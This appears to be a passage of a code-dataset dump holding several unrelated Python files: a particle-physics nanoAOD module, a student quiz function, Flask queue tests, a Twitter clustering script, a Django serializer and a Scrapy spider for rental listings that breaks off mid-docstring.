wrappedOutputTree\n\t\n\t\tself.out.branch(\"GenDeltaPhiLepWSum\",\"F\");\n\t\tself.out.branch(\"GenDeltaPhiLepWDirect\",\"F\");\n\t\tself.out.branch(\"GenWSumMass\",\"F\");\n\t\tself.out.branch(\"GenWDirectMass\",\"F\");\n\t\tself.out.branch(\"nidxGenWs\",\"I\");\n\t\tself.out.branch(\"GenmTLepNu\",\"F\");\n\t\tself.out.branch(\"LeptonDecayChannelFlag\",\"I\");\n\t\tself.out.branch(\"genTau_grandmotherId\",\"F\");\n\t\tself.out.branch(\"genTau_motherId\",\"F\");\n\t\tself.out.branch(\"genLep_grandmotherId\",\"F\");\n\t\tself.out.branch(\"genLep_motherId\",\"F\");\n\t\t#self.out.branch(\"IsDiLepEvent\",\"O\");\n\t\t#self.out.branch(\"IsSemiLepEvent\",\"O\");\n\tdef mt_2(self, p4one, p4two):\n\t\t# transverse mass of the lepton-neutrino system\n\t\treturn math.sqrt(2*p4one.Pt()*p4two.Pt()*(1-math.cos(p4one.Phi()-p4two.Phi())))\n\tdef endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n\t\tpass\n\tdef analyze(self, event):\n\t\t\"\"\"process event, return True (go to next module) or False (fail, go to next event)\"\"\"\n\t\tgenpart = Collection(event, \"GenPart\")\n\t\t# The following variables still need to be double-checked for validity\n\t\tgenLeps = [l for l in genpart if abs(l.pdgId) in (11, 13) and l.genPartIdxMother >= 0 ]\n\t\t# for some reason TTjets_* does not have GenPart_statusFlags; better to check before using it \n\t\tif hasattr(event,\"GenPart_statusFlags\"):\n\t\t\tgenLepFromTau = [l for l in genLeps if l.statusFlags == 2]\n\t\telse: genLepFromTau = [l for l in genLeps]\n\t\tgenTaus = [l for l in genpart if abs(l.pdgId) == 15 and l.genPartIdxMother >= 0]\n\t\tgenParts = [l for l in genpart]\n\t\t#leptons from tau decay https://github.com/cms-nanoAOD/cmssw/blob/master/PhysicsTools/NanoAOD/python/genparticles_cff.py#L67\n\t\tgenLepsAndLepsFromTaus = [l for l in genLeps] + [ l for l in genLepFromTau]\n\t\t\n\t\t#### for genlept mother and grandmother ID \t\t\n\t\t#print genLepsAndLepsFromTaus\n\t\tngenLepFromTau = len(genLepFromTau)\n\t\tngenLeps = len(genLeps)\n\t\tngenTaus = len(genTaus)\n\t\tngenParts = len (genParts)\n\t\tngenLepsAndLepsFromTau = len(genLepsAndLepsFromTaus)\n\t\t\n\t\tGenDeltaPhiLepWSum=-999\n\t\tGenDeltaPhiLepWDirect=-999\n\t\tGenWSumMass=-999\n\t\tGenWDirectMass=-999\n\t\tGenmTLepNu=-999\n\t\tLeptonDecayChannelFlag=-999 \n\t\tidx_genWs=[]\n\t\tidx_genLeps=[]\n\t\tidx_genNus=[]\n\t\tgenLep_motherId = -999\n\t\tgenLep_motherIdx = -999\n\t\tgenLep_grandmotherId = -999\n\t\tgenTau_motherId = -999\n\t\tgenTau_motherIdx = -999\n\t\tgenTau_grandmotherId = -999\n\t\t# find gen-level neutrinos (status 23), calculate deltaPhi (lep, nu), and genW-masses m(lep+nu)\n\t\t# for this: start from genLeps (status 23)\n\t\tfor glep in genLeps: \n\t\t\tif glep.status == 23 : \n\t\t\t\tgenLep_motherId = genpart[glep.genPartIdxMother].pdgId\n\t\t\t\tgenLep_motherIdx = glep.genPartIdxMother\n\t\t\t\tgenLep_grandmotherIdx = genpart[genLep_motherIdx].genPartIdxMother\n\t\t\t\tif genLep_grandmotherIdx >=0 : \n\t\t\t\t\tgenLep_grandmotherId = genpart[genLep_grandmotherIdx].pdgId\n\t\t\t\tself.out.fillBranch(\"genLep_motherId\",genLep_motherId)\n\t\t\t\tself.out.fillBranch(\"genLep_grandmotherId\",genLep_grandmotherId)\n\t\t\n\t\tfor gtau in genTaus: \n\t\t\tgenTau_motherId = genpart[gtau.genPartIdxMother].pdgId\n\t\t\tgenTau_motherIdx = gtau.genPartIdxMother\n\t\t\tgenTau_grandmotherIdx = genpart[genTau_motherIdx].genPartIdxMother\n\t\t\tif genTau_grandmotherIdx >=0:\n\t\t\t\tgenTau_grandmotherId = 
genpart[genTau_grandmotherIdx].pdgId\n\t\t\tself.out.fillBranch(\"genTau_motherId\",genTau_motherId)\n\t\t\tself.out.fillBranch(\"genTau_grandmotherId\",genTau_grandmotherId)\n\t\t\n\t\tfor i_lep, genLep in enumerate(genLeps):\n\t\t\tif genLep.status == 23 and abs(genParts[genLep.genPartIdxMother].pdgId) == 24: # genLep is outgoing and has W as mother\n\t\t\t\tW_idx = genLep.genPartIdxMother\n\t\t\t\tidx_genWs.append(W_idx)\n\t\t\t\tidx_genLeps.append(i_lep)\n\t\t\t\tfor i_nu, genPart in enumerate(genParts):\n\t\t\t\t\tif genPart.genPartIdxMother==W_idx and genPart.status == 23: # find W as mother\n\t\t\t\t\t\tif abs(genPart.pdgId) == 12 or abs(genPart.pdgId) == 14 or abs(genPart.pdgId) == 16: #check whether it is a neutrino\n\t\t\t\t\t\t\tidx_genNus.append(i_nu)\n\t\t\n\t\t\n\t\tif(len(idx_genLeps)>=1):\n\t\t\tgenLepP4 = genLeps[idx_genLeps[0]].p4()\n\t\t\tif len(idx_genNus) >= 1:\n\t\t\t\tgenNuP4 = genParts[idx_genNus[0]].p4()\n\t\t\t\tgenWSumP4 = genLepP4 + genNuP4\n\t\t\t\tgenWDirectP4 = genParts[genLeps[idx_genLeps[0]].genPartIdxMother].p4()\n\t\t\t\tGenDeltaPhiLepWSum = genLepP4.DeltaPhi(genWSumP4)\n\t\t\t\tGenDeltaPhiLepWDirect = genLepP4.DeltaPhi(genWDirectP4)\n\t\t\t\tGenWSumMass = genWSumP4.M()\n\t\t\t\tGenWDirectMass = genWDirectP4.M()\n\t\t\t\tGenmTLepNu = self.mt_2(genLepP4, genNuP4)\n\t\t\n\t\t#print ngenLepsAndLepsFromTau, ngenLeps + ngenTaus, ngenLepFromTau+ngenLeps\n\t\tassert ngenLepsAndLepsFromTau==ngenLepFromTau+ngenLeps\n\t\tif ngenLeps + ngenTaus ==2: #looking at dileptonic events\n\t\t\tIsDiLepEvent = True\n\t\t\tIsHadTauEvent = (ngenTaus > ngenLepFromTau)\n\t\t\tLeptonsInAcceptance = True\n\t\t\tPtMax = -999\n\t\t\tfor l in genLepsAndLepsFromTaus: \n\t\t\t\tif l.pt>PtMax: PtMax = l.pt \n\t\t\n\t\t\tif IsHadTauEvent: LeptonDecayChannelFlag = 1 # preconfigure HadTau (because the next loop won't start for two had taus in the event)\n\t\t\tfor l in genLepsAndLepsFromTaus:\n\t\t\t\tif PtMax>=25 and l.pt<10: LeptonsInAcceptance=False\n\t\t\t\tif PtMax<25 and l.pt<5: LeptonsInAcceptance=False\n\t\t\t\tlepEta = abs(l.eta)\n\t\t\t\tif (lepEta>2.5): LeptonsInAcceptance=False\n\t\t\t\tif (abs(l.pdgId) == 11 and lepEta >= 1.44 and lepEta < 1.57): LeptonsInAcceptance=False\n\t\t\t\t\n\t\t\t\tif IsHadTauEvent and not LeptonsInAcceptance: LeptonDecayChannelFlag = 0 # OutOfAcceptance and HadTau\n\t\t\t\telif IsHadTauEvent: LeptonDecayChannelFlag = 1 # HadTau (only)\n\t\t\t\telif not LeptonsInAcceptance: LeptonDecayChannelFlag = 2 # OutOfAcceptance (only)\n\t\t\t\telse: LeptonDecayChannelFlag = 3 # Rest (Id/Isolation/Resolution)\n\n\t\tself.out.fillBranch(\"GenDeltaPhiLepWSum\", GenDeltaPhiLepWSum)\n\t\tself.out.fillBranch(\"GenDeltaPhiLepWDirect\", GenDeltaPhiLepWDirect)\n\t\tself.out.fillBranch(\"GenWSumMass\", GenWSumMass)\n\t\tself.out.fillBranch(\"GenWDirectMass\", GenWDirectMass)\n\t\tself.out.fillBranch(\"GenmTLepNu\", GenmTLepNu)\n\t\tself.out.fillBranch(\"nidxGenWs\", len(idx_genWs))\n\t\tself.out.fillBranch(\"LeptonDecayChannelFlag\", LeptonDecayChannelFlag)\n\t\t\n\t\treturn True\n\n\n# define modules using the syntax 'name = lambda : constructor' to avoid having them loaded when not needed\nsusy_1l_gen = lambda : genpartsusy()#,\n 
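#\n# Usage sketch (an assumption, not part of the original module -- the import is\n# the standard nanoAOD-tools PostProcessor and \"input.root\" is a placeholder):\n#\n# from PhysicsTools.NanoAODTools.postprocessing.framework.postprocessor import PostProcessor\n# PostProcessor(\".\", [\"input.root\"], modules=[susy_1l_gen()]).run()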
\n","sub_path":"python/postprocessing/modules/susy1lep_gen.py","file_name":"susy1lep_gen.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"305869012","text":"__author__ = 'Jiggy'\n\n# Prompts the user for a word and outputs the list of\n# all subwords of the word of height 1.\n#\n# Written by *** for COMP9021\n\n\ndef extract_subwords(word):\n pass\n # Replace pass above with your code\n temp_word = word.replace(' ','')\n # print('Word without spaces :', temp_word)\n finallist_of_words = []\n temp_string = ''\n found_opening_brecket = False\n\n for charaIndex in range(0, len(temp_word)):\n current_char = temp_word[charaIndex]\n if current_char == '(' and found_opening_brecket == False:\n found_opening_brecket = True\n temp_string += current_char\n elif current_char == '(' and found_opening_brecket == True:\n # print('temp string :', temp_string)\n sub_temp = ''\n if '(' in temp_string or ',' in temp_string:\n if temp_string.rfind(',') != -1:\n sub_temp = temp_string[temp_string.rfind(',')+1:]\n elif temp_string.rfind('(') != -1:\n sub_temp = temp_string[temp_string.rfind('(')+1:]\n\n # print('Sub temp', sub_temp)\n temp_string = ''\n temp_string += sub_temp + current_char\n else:\n temp_string = ''\n temp_string += current_char\n elif current_char == ',':\n if found_opening_brecket == True:\n temp_string += current_char +' '\n else:\n temp_string += current_char\n if current_char == ')' and found_opening_brecket == True:\n # print('Closing ', temp_string)\n finallist_of_words.append(temp_string.strip())\n temp_string = ''\n found_opening_brecket = False\n elif current_char == ')' and found_opening_brecket == False:\n temp_string = ''\n\n return_string = '\\t' + '['\n for my_word in finallist_of_words:\n return_string += '\\''+my_word+'\\'' + ', '\n\n ##if len(finallist_of_words) > 0:\n ## return_string = return_string[0: len(return_string)-2] + ']'\n ##else:\n ## return_string += ']'\n\n return finallist_of_words\n\nword = input('Enter a word: ')\nprint('The subwords of \"{:}\" of height 1 are:\\n {:}'.format(word, extract_subwords(word)))","sub_path":"quiz_3.py","file_name":"quiz_3.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"106128500","text":"import pytest\nfrom pretend import stub\nfrom result_queue import Server, dispatch_dns, dispatch_https, dispatch_ssl\n\ntest_queues = {\n \"https\": stub(enqueue=lambda func, payload, retry, job_timeout, result_ttl: None),\n \"ssl\": stub(enqueue=lambda func, payload, retry, job_timeout, result_ttl: None),\n \"dns\": stub(enqueue=lambda func, payload, retry, job_timeout, result_ttl: None),\n}\n\n\n@pytest.fixture\ndef app():\n client = Server(\"test\", queues=test_queues)\n return client\n\n\n@pytest.fixture\ndef client(app):\n with app.test_client() as cli:\n yield cli\n\n\ndef test_enqueue_dns(client):\n test_payload = {\n \"scan_id\": 1,\n \"domain\": \"cyber.gc.ca\",\n \"selectors\": [\"selector1._domainkey\", \"selector2._domainkey\"],\n }\n\n res = client.post(\"/dns\", json=test_payload)\n\n assert res.data.decode(\"utf-8\") == \"DNS result processing request enqueued.\"\n\n\ndef test_enqueue_https(client):\n test_payload = {\n \"scan_id\": 1,\n \"domain\": \"cyber.gc.ca\",\n }\n\n res = client.post(\"/https\", json=test_payload)\n\n assert res.data.decode(\"utf-8\") == \"HTTPS result processing request enqueued.\"\n\n\ndef 
test_enqueue_ssl(client):\n test_payload = {\n \"scan_id\": 1,\n \"domain\": \"cyber.gc.ca\",\n }\n\n res = client.post(\"/ssl\", json=test_payload)\n\n assert res.data.decode(\"utf-8\") == \"SSL result processing request enqueued.\"\n","sub_path":"services/queues/result/tests/test_result_queue.py","file_name":"test_result_queue.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"455743384","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\nimport os\nfrom os import path\nimport gc\nimport time\nimport numpy as np\nfrom tqdm import tqdm\n#from multiprocessing import Pool,Manager\nfrom mpipool import Pool\n#from schwimmbad import MPIPool as Pool\nimport multiprocessing \ntry:\n import cPickle as pickle\nexcept:\n import pickle\n# In[2]:\n\n\n\n# In[3]:\n\n\ndef merge(d1, d2):\n for item in d2:\n if item in d1.keys():\n d1[item] += d2[item]\n else:\n d1[item] = d2[item]\n\n\n# In[4]:\n\ndef L_func(cols,r,r2,n):\n l1= np.sqrt(r*np.ones(len(cols)) * col_count_ser[cols]/N ) * np.log((n+1)/(col_count_ser[cols]+1))\n l2= np.sqrt(r2*np.ones(len(cols)) * col_count_ser[cols]/N ) * np.log((n+1)/(col_count_ser[cols]+1))\n return np.dot(l1,l2)\n\n\ndef make_pairs(k):\n v=dict_A[k]\n r=row_count[k]\n for (k2,v2) in dict_A.items():\n if ((k,k2) not in Sim_pair.keys()) and ((k,k2) not in Sim_pair.keys()):\n common_keys= set(v).intersection(set(v2))\n #print(len(common_keys))\n r2=row_count[k2]\n Sim_pair[(k,k2)] = L_func(common_keys,r,r2,n)\n else:\n continue\n return Sim_pair\n\n# In[5]:\n\nif __name__ == '__main__':\n\n data = \"./clustering_Biden/\"\n\n N= 10000000\n\n\n\n# In[6]:\n\n\n entries=os.listdir(data)\n \n \n # In[7]:\n \n \n #from multiprocessing import Process, Lock, Manager\n # About 1min/file, may need parallization later.\n if (not path.exists(\"./dict_A.pickle\")):\n t1 = time.time()\n # A dictionary that holds all records in A\n dict_A = dict()\n # A dictionary that holds row counts\n row_count = dict()\n # A dictionary that holds row counts\n col_count = dict()\n \n \n for file in tqdm(entries):\n #def reformat(dict_A, row_count, col_count, file):\n file = data+file\n #print(file)\n df = pd.read_csv(file, index_col=\"Author\")\n #print(df.head(1))\n # Update column sum and row sum\n merge(col_count,df.count().to_dict())\n row_count.update(df.sum(axis=1).to_dict())\n #print(len(col_count))\n #print(len(row_count))\n for Author in df.index:\n cols=df.columns[df.loc[Author,:].notnull()]\n dict_A[Author] = cols.tolist()\n #print(dict_A)\n #print(df.info()) \n del df\n gc.collect()\n \n \n t2 = time.time()\n print(t2-t1)\n \n \n # In[9]:\n \n \n with open(\"./dict_A.pickle\",\"wb\") as pickle_dict_A:\n pickle.dump(dict_A, pickle_dict_A)\n with open(\"./row_count.pickle\",\"wb\") as pickle_row:\n pickle.dump(row_count, pickle_row)\n with open(\"./col_count.pickle\",\"wb\") as pickle_col:\n pickle.dump(col_count, pickle_col)\n else:\n with open(\"./dict_A.pickle\",\"rb\") as afile:\n dict_A = pickle.load(afile) \n with open(\"./row_count.pickle\",\"rb\") as rfile:\n row_count = pickle.load(rfile) \n with open(\"./col_count.pickle\",\"rb\") as cfile:\n col_count = pickle.load(cfile) \n \n #print(len(dict_A))\n #print(len(row_count))\n #print(len(col_count))\n \n \n col_count_ser = pd.Series(col_count)\n #row_count_ser = pd.Series(row_count)\n \n \n n=sum(col_count.values())\n #print(n)\n\n\n # m = Manager() \n\n # Sim_pair=m.dict()\n # num_cores=multiprocessing.cpu_count()\n 
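# NOTE: os.getenv returns a string (or None), so cast before any arithmetic,\n # e.g. num_cores = int(os.getenv(\"NSLOTS\") or multiprocessing.cpu_count())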
num_cores=os.getenv(\"NSLOTS\")\n #print(\"num_cores: \", num_cores) \n\n t1 = time.time()\n key_list = list(dict_A.keys())\n# for k in key_list[rank*chunk:(rank+1)*chunk]:\n# make_pairs(k, Sim_pair)\n\n #processed_list = Parallel(n_jobs=num_cores)(delayed(make_pairs)(i) for i in inputs)\n \n Sim_pair=dict()\n # with Pool() as p:\n with Pool() as p:\n if not p.is_master():\n pool.wait()\n sys.exit(0)\n inputs = tqdm(key_list)\n Sim_pair_list = list(p.map(make_pairs, inputs))\n with open(\"./Sim_pair_mpipool/Sim_pair_\"+str(os.getpid)+\".pickle\",\"wb\") as pickle_out:\n pickle.dump(Sim_pair, pickle_out)\n #p.map(make_pairs, key_list[rank*chunk:(rank+1)*chunk])\n # print(len(Sim_pair_list))\n\n#for (k,v) in tqdm(dict_A.items()):\n t2 = time.time()\n #print(\"time used: \",t2-t1)\n\n Sim_pair_all=dict()\n #print(len(Sim_pair_list))\n for i in Sim_pair_list:\n Sim_pair_all.update(i)\n \n with open(\"./Sim_pair.pickle\",\"wb\") as pickle_out:\n pickle.dump(Sim_pair_all, pickle_out)\n \n","sub_path":"clustering_twitter_full_mpipool.py","file_name":"clustering_twitter_full_mpipool.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135202937","text":"\"\"\"\nJSON serializer with the following properties:\n - output is ordered (so revision control diffs are sane)\n - Fixes multi-table inheritance as per\n - https://code.djangoproject.com/ticket/24607\n - https://github.com/django/django/pull/4477/files\n\nThe patch at https://github.com/levic/django/tree/inheritance-natural-key patches core to work but only works with 1.9+\n\nThis implementation works with django 1.8 only (django ORM meta changed with 1.9)\n\nTo use, in your settings.py add:\n\nSERIALIZATION_MODULES = {\n 'json_orminheritancefix': 'allianceutils.serializers.json_orminheritancefix',\n 'json': 'allianceutils.serializers.json_orminheritancefix',\n}\n\n- We have to override the built-in json because we want to deserialize .json files correctly\n- There is no way to override django.core.serializers.python.Deserializer in part so this is a cut & paste\n of both the json & python deserializers with patches applied\n\"\"\"\n\n\nimport json\nimport sys\n\nimport allianceutils.serializers.json_ordered\nimport django\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.core.serializers import base\nfrom django.core.serializers.base import DeserializationError\nfrom django.db import DEFAULT_DB_ALIAS\nfrom django.db import models\nfrom django.utils import six\nfrom django.utils.encoding import force_text\n\n# The ORM _meta changed in 1.9, this code only works with 1.8\nassert (1, 9) <= django.VERSION < (1, 10), 'json_orminheritancefix19 only works with django 1.9'\n\n_NONE = object()\n\n\nclass Serializer(allianceutils.serializers.json_ordered.Serializer):\n def serialize(self, queryset, **options):\n options = options.copy()\n if options.get('use_natural_primary_keys', False):\n options['use_natural_foreign_keys'] = True\n\n return super(Serializer, self).serialize(queryset, **options)\n\n def get_dump_pk(self, obj, level):\n pk = obj._meta.pk\n if pk.remote_field:\n if self.use_natural_foreign_keys:\n return self.get_dump_pk(getattr(obj, pk.remote_field.field.name), level + 1)\n else:\n return force_text(obj.pk, strings_only=True)\n elif self.use_natural_primary_keys and hasattr(obj, \"natural_key\"):\n return _NONE if level == 0 else obj.natural_key()\n else:\n return force_text(obj.pk, strings_only=True)\n\n def 
get_dump_object(self, obj):\n data = super(Serializer, self).get_dump_object(obj)\n # overwrite default PK if necessary to handle where the PK is a FK\n pk = self.get_dump_pk(obj, 0)\n if pk is not _NONE:\n data[\"pk\"] = pk\n data['fields'] = self._current\n return data\n\n\n# No changes here except to use the PythonDeserializer function in this module\ndef Deserializer(stream_or_string, **options):\n \"\"\"\n Deserialize a stream or string of JSON data.\n \"\"\"\n if not isinstance(stream_or_string, (bytes, six.string_types)):\n stream_or_string = stream_or_string.read()\n if isinstance(stream_or_string, bytes):\n stream_or_string = stream_or_string.decode('utf-8')\n try:\n objects = json.loads(stream_or_string)\n for obj in _PythonDeserializer(objects, **options):\n yield obj\n except GeneratorExit:\n raise\n except Exception as e:\n # Map to deserializer error\n six.reraise(DeserializationError, DeserializationError(e), sys.exc_info()[2])\n\n\ndef _get_by_natural_pk(model, npk):\n while True:\n pk = model._meta.pk\n if pk.remote_field:\n model = pk.remote_field.model\n else:\n return model._default_manager.get_by_natural_key(*npk).pk\n\n\ndef _PythonDeserializer(object_list, **options):\n \"\"\"\n Deserialize simple Python objects back into Django ORM instances.\n It's expected that you pass the Python objects themselves (instead of a\n stream or a string) to the constructor\n \"\"\"\n db = options.pop('using', DEFAULT_DB_ALIAS)\n ignore = options.pop('ignorenonexistent', False)\n field_names_cache = {} # Model: \n\n for d in object_list:\n # Look up the model and starting build a dict of data for it.\n try:\n Model = _get_model(d[\"model\"])\n except base.DeserializationError:\n if ignore:\n continue\n else:\n raise\n data = {}\n if 'pk' in d:\n pk = d.get(\"pk\", None)\n if isinstance(pk, (list, tuple)):\n pk = _get_by_natural_pk(Model, pk)\n else:\n try:\n pk = Model._meta.pk.to_python(pk)\n except Exception as e:\n raise base.DeserializationError.WithData(e, d['model'], pk, None)\n data[Model._meta.pk.attname] = pk\n m2m_data = {}\n\n if Model not in field_names_cache:\n field_names_cache[Model] = {f.name for f in Model._meta.get_fields()}\n field_names = field_names_cache[Model]\n\n # Handle each field\n for (field_name, field_value) in six.iteritems(d[\"fields\"]):\n\n if ignore and field_name not in field_names:\n # skip fields no longer on model\n continue\n\n if isinstance(field_value, str):\n field_value = force_text(\n field_value, options.get(\"encoding\", settings.DEFAULT_CHARSET), strings_only=True\n )\n\n field = Model._meta.get_field(field_name)\n\n # Handle M2M relations\n if field.remote_field and isinstance(field.remote_field, models.ManyToManyRel):\n model = field.remote_field.model\n if hasattr(model._default_manager, 'get_by_natural_key'):\n def m2m_convert(value):\n if hasattr(value, '__iter__') and not isinstance(value, six.text_type):\n return model._default_manager.db_manager(db).get_by_natural_key(*value).pk\n else:\n return force_text(model._meta.pk.to_python(value), strings_only=True)\n else:\n def m2m_convert(v):\n return force_text(model._meta.pk.to_python(v), strings_only=True)\n\n try:\n m2m_data[field.name] = []\n for pk in field_value:\n m2m_data[field.name].append(m2m_convert(pk))\n except Exception as e:\n raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), pk)\n\n # Handle FK fields\n elif field.remote_field and isinstance(field.remote_field, models.ManyToOneRel):\n model = field.remote_field.model\n if field_value is not None:\n 
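The FK branch that follows leans on Django's natural-key convention; for readers unfamiliar with it, here is a minimal sketch of what a model must provide for natural_key()/get_by_natural_key() to round-trip. The Author model and its email key are hypothetical, not part of this serializer:

from django.db import models

class AuthorManager(models.Manager):
    # Invoked by the deserializer when a serialized key arrives as a
    # natural-key tuple rather than a raw primary key.
    def get_by_natural_key(self, email):
        return self.get(email=email)

class Author(models.Model):
    email = models.EmailField(unique=True)
    objects = AuthorManager()

    def natural_key(self):
        # Must round-trip with AuthorManager.get_by_natural_key above.
        return (self.email,)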
try:\n default_manager = model._default_manager\n field_name = field.remote_field.field_name\n if hasattr(default_manager, 'get_by_natural_key'):\n if hasattr(field_value, '__iter__') and not isinstance(field_value, six.text_type):\n obj = default_manager.db_manager(db).get_by_natural_key(*field_value)\n value = getattr(obj, field.remote_field.field_name)\n # If this is a natural foreign key to an object that\n # has a FK/O2O as the foreign key, use the FK value\n if model._meta.pk.remote_field:\n value = value.pk\n else:\n value = model._meta.get_field(field_name).to_python(field_value)\n data[field.attname] = value\n else:\n data[field.attname] = model._meta.get_field(field_name).to_python(field_value)\n except Exception as e:\n raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), field_value)\n else:\n data[field.attname] = None\n\n # Handle all other fields\n else:\n try:\n data[field.name] = field.to_python(field_value)\n except Exception as e:\n raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), field_value)\n\n obj = base.build_instance(Model, data, db)\n yield base.DeserializedObject(obj, m2m_data)\n\n\ndef _get_model(model_identifier):\n \"\"\"\n Helper to look up a model from an \"app_label.model_name\" string.\n \"\"\"\n try:\n return apps.get_model(model_identifier)\n except (LookupError, TypeError):\n raise base.DeserializationError(\"Invalid model identifier: '%s'\" % model_identifier)\n","sub_path":"nac/allianceutils/serializers/json_orminheritancefix/json_orminheritancefix19.py","file_name":"json_orminheritancefix19.py","file_ext":"py","file_size_in_byte":8851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"454738856","text":"import scrapy\nfrom scrapy_redis.spiders import RedisSpider\nfrom scrapy.exceptions import CloseSpider\n\nimport copy\nimport json\nimport time\nfrom urllib.parse import urlparse\n\nfrom ziroom.items import ZiroomItem\n\n\nclass ZiroomSpider(RedisSpider):\n\n name = 'ziroom'\n custom_settings = {\n 'LOG_LEVEL': 'INFO',\n 'COOKIES_ENABLED': False,\n 'REDIRECT_ENABLED': False,\n 'DNS_TIMEOUT': 5,\n 'DOWNLOAD_TIMEOUT': 30,\n 'CONCURRENT_REQUESTS': 64,\n 'CONCURRENT_REQUESTS_PER_IP': 16,\n 'RETRY_HTTP_CODES': [500, 502, 503, 504, 400, 408, 478, 510], # 增加:478 510\n 'LOG_FILE': 'your log folder path' \\\n + time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime()) + '.log', \n # 日志目录必须已存在\n 'ITEM_PIPELINES': {\n 'ziroom.pipelines.Price': 200, # 识别价格\n 'ziroom.pipelines.SaveMain': 300, # 保存主干信息\n 'ziroom.pipelines.Keeper': 400, # 管家信息\n 'ziroom.pipelines.PaymentAir': 500, # 支付详情 && 空气质量 && 视频地址\n 'ziroom.pipelines.Allocation': 600, # 房屋配置信息\n }\n }\n\n def parse(self, response):\n ''''起始页'''\n url_parsed = urlparse(response.url)\n urls_sel = response.xpath('//dl[@class=\"clearfix zIndex6\"]//\\\n div[@class=\"con\"]/span[@class=\"tag\"][position()>1]/a/@href').extract()\n if not urls_sel:\n self.log_200_abnormal(response, close=True)\n return\n for url in urls_sel:\n yield scrapy.Request(url_parsed.scheme + ':' + url, callback=self.parse_list)\n\n def parse_list(self, response):\n '''列表页\n 例:http://sh.ziroom.com/z/nl/z3-d310104-b611900103.html\n '''\n self.logger.info(f\"crawled 列表页:{response.url}\")\n # 价格信息\n # 在列表页而非详情页匹配价格信息,尽量减少请求价格图片时的 request 数量\n price_png_url = response.xpath('//script[contains(text(), \\\n \"offset_unit\")]').re_first(r'image\":\"//(.+)\",')\n price_positions_str = response.xpath('//script[contains(text(), \\\n 
\"offset_unit\")]').re_first(r'\"offset\":\\[(.+)\\]\\};')\n if price_png_url and price_positions_str:\n price_png_url = urlparse(response.url).scheme + '://' + price_png_url\n price_positions = list(map(\n lambda x: list(map(int, x.split(','))), \n price_positions_str.strip('[').strip(']').split('],[')\n ))\n else:\n if response.body.decode().find('我们找不到任何与您的搜索条件匹配的结果') == -1:\n self.log_200_abnormal(\n response, position='抓取:列表页', \n statement='未匹配到价格图片url、价格位置字符串', \n close=False\n )\n return\n\n # 提取部分信息(部分信息只能在列表页提取到)\n sel_info = response.xpath('//ul[@id=\"houseList\"]/li')\n city = response.xpath('//span[@id=\"curCityName\"]/text()').extract_first()\n url_parsed = urlparse(response.url)\n for k, v in enumerate(sel_info):\n item = ZiroomItem()\n item['city'] = city\n item['price'] = {\n 'num': None,\n 'payment': v.xpath('div[@class=\"priceDetail\"]/p[@class=\"price\"]\\\n /span[@class=\"gray-6\"]/text()').re_first(r'\\((.+)\\)'),\n 'path': None,\n 'origin_src': price_png_url,\n 'position': price_positions[k],\n 'referer':copy.copy(response.url)\n }\n item['title_thumb'] = {\n 'path': None,\n 'referer': copy.copy(response.url),\n 'origin_src': urlparse(response.url).scheme + '://' + \\\n v.xpath('div[@class=\"img pr\"]/a/img/@_src').re_first(r'^//(.+)')\n }\n item['room_id'] = int(v.xpath('div[@class=\"txt\"]/h3/a/@href')\\\n .re_first(r'/(\\d+)\\.html'))\n item['product'] = v.xpath('div[@class=\"txt\"]/h3/a/text()')\\\n .re_first(r'(\\S+) · .+')\n item['room_name'] = v.xpath('div[@class=\"txt\"]/h3/a/text()')\\\n .re_first(r'\\S+ · (.+)')\n item['room_style'] = v.xpath('div[@class=\"txt\"]/p[@class=\"room_tags \\\n clearfix\"]//span[@class=\"style\"]/text()').extract_first()\n item['is_first_rent'] = v.xpath('div[@class=\"txt\"]/h4/span\\\n [@class=\"green\"][contains(text(), \"首次出租\")]/text()').re_first(r'\\S+')\n item['is_near_subway'] = v.xpath('div[@class=\"txt\"]/p[@class=\"room_tags \\\n clearfix\"]//span[text()=\"离地铁近\"]/text()').extract_first()\n item['is_private_bathroom'] = v.xpath('div[@class=\"txt\"]/\\\n p[@class=\"room_tags clearfix\"]//span[text()=\"独卫\"]/text()').extract_first()\n item['is_private_balcony'] = v.xpath('div[@class=\"txt\"]/\\\n p[@class=\"room_tags clearfix\"]//span[text()=\"独立阳台\"]/text()').extract_first()\n item['heating'] = v.xpath('div[@class=\"txt\"]/p[@class=\\\n \"room_tags clearfix\"]//span[text()=\"集体供暖\" \\\n or text()=\"独立供暖\" or text()=\"中央空调\"]/text()').extract_first()\n url = v.xpath('div[@class=\"txt\"]/h3/a/@href').re_first(r'//(.+html)')\n yield scrapy.Request(\n url_parsed.scheme + '://' + url, \n meta={'item': item}, \n callback=self.parse_detail\n )\n\n # 每一页:page > 1\n if response.url.find('?p=') < 0:\n total_page = response.xpath('//div[@id=\"page\"]/span[contains(text(), \\\n \"共\")]/text()').re_first(r'共(\\d+)页')\n if total_page:\n for v in range(2, int(total_page) + 1):\n # 为每个请求伪造更合理的 referer,而非都以本次请求地址为 referer\n url = response.url + '?p=' + str(v)\n if v == 2:\n referer = copy.copy(response.url)\n else:\n referer = copy.copy(response.url) + '?p=' + str(v-1)\n yield scrapy.Request(\n url, \n meta={'referer': referer}, \n callback=self.parse_list\n )\n\n def parse_detail(self, response):\n '''详情页\n 例(详情):http://www.ziroom.com/z/vr/61230316.html\n 例(支付详情 && 空气质量):http://sh.ziroom.com/detail/info?id=61720868&house_id=60273906\n 例(管家):http://sh.ziroom.com/detail/steward?resblock_id=5011102207629&room_id=\n 61720868&house_id=60273906&ly_name=&ly_phone=\n 例(房屋配置):http://sh.ziroom.com/detail/config?house_id=60273906&id=61720868\n 
